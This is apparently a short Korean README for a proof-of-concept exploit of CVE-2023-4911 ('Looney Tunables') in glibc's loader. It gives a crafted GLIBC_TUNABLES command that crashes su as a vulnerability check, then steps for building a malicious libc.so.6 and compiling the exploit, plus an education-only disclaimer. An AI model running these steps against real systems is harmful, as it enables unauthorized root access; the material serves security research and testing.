
이것은 glibc 동적 로더의 GLIBC_TUNABLES 환경 변수 파싱 함수 parse_tunables() 의 버그를 이용하는 CVE-2023-4911("Looney Tunables")의 PoC입니다.
env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help
Segmentation fault (core dumped) 메시지가 나타나면 취약한 대상입니다.libc.so.6 파일 생성python3 libc.py
gcc exp.c -o exp
이 저장소에 제공된 모든 코드는 교육/연구 목적으로만 사용됩니다. 이 저장소에 포함된 자료와 관련된 모든 행동 및/또는 활동은 전적으로 사용자 본인의 책임입니다. 이 저장소의 코드를 오용하면 관련 개인에게 형사 고발이 제기될 수 있습니다. 저자는 이 저장소의 코드를 불법적으로 오용하는 개인에게 형사 고발이 제기되는 경우 책임을 지지 않습니다.